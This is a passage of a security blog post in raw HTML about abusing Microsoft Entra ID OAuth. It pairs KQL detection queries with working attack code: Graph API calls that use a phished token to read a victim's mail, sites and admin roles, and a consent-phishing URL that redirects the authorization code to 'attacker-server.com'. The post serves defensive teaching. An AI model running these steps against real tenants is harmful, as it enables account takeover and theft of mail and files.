class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"authorization_pending\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sleep</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Keep polling</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Step 4: Attacker uses refresh token to enumerate and access resources</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">headers </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Bearer </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">access_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Who am I?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">me </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># What emails can I read?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">emails </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/messages?$top=10&amp;$select=subject,from,receivedDateTime\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># What SharePoint sites exist?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">sites </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/sites?search=*\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Who are the Global Admins?</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">admins </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/directoryRoles?$filter=displayName eq 'Global Administrator'\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<p>The attacker now has a 90-day refresh token. They can read all emails, enumerate the entire directory, access SharePoint, and  depending on the victim's role  potentially escalate further.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"detection\">Detection<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#detection\" class=\"hash-link\" aria-label=\"Direct link to Detection\" title=\"Direct link to Detection\" translate=\"no\">​</a></h3>\n<p>Device code phishing is detectable, but only if you know what to look for. The key signal is in <code>AADSignInLogs</code> where <code>AuthenticationProtocol = deviceCode</code> for users who should never be using that protocol.</p>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Detect suspicious device code authentications</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AppDisplayName !in (  // exclude known legitimate device-code apps</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Microsoft Azure PowerShell\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Microsoft Azure CLI\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Visual Studio Code\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TimeGenerated,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UserPrincipalName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IPAddress,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Location,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DeviceDetail,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AppDisplayName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Status</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Status.errorCode == 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Alert on device code auth from unfamiliar location for user</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let known_locations = </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AADSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(30d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol != \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | summarize KnownLocations = make_set(Location) by UserPrincipalName;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(1d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| join kind=leftouter known_locations on UserPrincipalName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where not(Location in (KnownLocations))</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, Location, IPAddress, AppDisplayName</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-3-oauth-consent-grant-abuse--persistent-access-through-fake-applications\">Section 3: OAuth Consent Grant Abuse  Persistent Access Through Fake Applications<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-3-oauth-consent-grant-abuse--persistent-access-through-fake-applications\" class=\"hash-link\" aria-label=\"Direct link to Section 3: OAuth Consent Grant Abuse  Persistent Access Through Fake Applications\" title=\"Direct link to Section 3: OAuth Consent Grant Abuse  Persistent Access Through Fake Applications\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-attack-that-survives-password-resets-and-mfa-changes\">The Attack That Survives Password Resets and MFA Changes<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-attack-that-survives-password-resets-and-mfa-changes\" class=\"hash-link\" aria-label=\"Direct link to The Attack That Survives Password Resets and MFA Changes\" title=\"Direct link to The Attack That Survives Password Resets and MFA Changes\" translate=\"no\">​</a></h3>\n<p>OAuth consent grant abuse is one of the most underestimated persistence mechanisms in enterprise environments. An attacker who tricks a user into consenting to a malicious application receives an OAuth token that persists through password resets, MFA changes, and account recovery  because it's bound to the application registration, not the credential.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-oauth-consent-works-and-where-it-breaks\">How OAuth Consent Works (And Where It Breaks)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#how-oauth-consent-works-and-where-it-breaks\" class=\"hash-link\" aria-label=\"Direct link to How OAuth Consent Works (And Where It Breaks)\" title=\"Direct link to How OAuth Consent Works (And Where It Breaks)\" translate=\"no\">​</a></h3>\n<p>When a user signs into a third-party app using \"Sign in with Microsoft,\" they see a consent prompt listing the permissions the app is requesting. If they consent, Entra ID creates a service principal in the tenant representing that application, and the delegated permissions are stored permanently.</p>\n<p>The problem: most users click through consent prompts without reading them. And Microsoft's default configuration allows users to consent to applications requesting low-privilege permissions without administrator approval.</p>\n<p><strong>Permissions that seem low-risk but enable significant access:</strong></p>\n<table><thead><tr><th>Permission</th><th>What it looks like</th><th>What it enables</th></tr></thead><tbody><tr><td><code>Mail.Read</code></td><td>\"Read your mail\"</td><td>Full inbox access, ongoing via refresh token</td></tr><tr><td><code>Files.Read.All</code></td><td>\"Read all files\"</td><td>Every SharePoint file and OneDrive document</td></tr><tr><td><code>User.ReadBasic.All</code></td><td>\"Read basic user profiles\"</td><td>Full directory enumeration</td></tr><tr><td><code>offline_access</code></td><td>(often not shown)</td><td>Persistent access via refresh token</td></tr><tr><td><code>MailboxSettings.Read</code></td><td>\"Read your mailbox settings\"</td><td>Email forwarding rules, inbox rules</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-attack-illicit-consent-grant\">The Attack: Illicit Consent Grant<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-attack-illicit-consent-grant\" class=\"hash-link\" aria-label=\"Direct link to The Attack: Illicit Consent Grant\" title=\"Direct link to The Attack: Illicit Consent Grant\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Attacker registers an application in any Azure tenant (including their own)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Sets redirect URI to their controlled server</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Crafts a consent URL targeting the victim organization</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">attacker_app_client_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"attacker-app-client-id-here\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">redirect_uri </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://attacker-server.com/callback\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tenant_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"target-company.onmicrosoft.com\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># or the tenant GUID</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Scopes requesting persistent, broad access</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">scopes </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\" \"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">join</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"openid\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"profile\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"email\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"offline_access\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/Mail.Read\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/Files.Read.All\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/User.ReadBasic.All\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/MailboxSettings.ReadWrite\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># enables forwarding rules</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Consent URL  sent to victim in phishing email</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">consent_url </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://login.microsoftonline.com/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">tenant_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/oauth2/v2.0/authorize\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"?client_id=</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">attacker_app_client_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;response_type=code\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;redirect_uri=</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">redirect_uri</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;scope=</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">scopes</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;response_mode=query\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;state=random-state-value\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># When victim clicks and consents, attacker receives an authorization code</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># They exchange it for access + refresh tokens</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Application grant persists indefinitely in the tenant</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># After consent, attacker sets up email forwarding using Graph API</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># This is the persistence play  even if the user changes their password,</span><span class=\"token 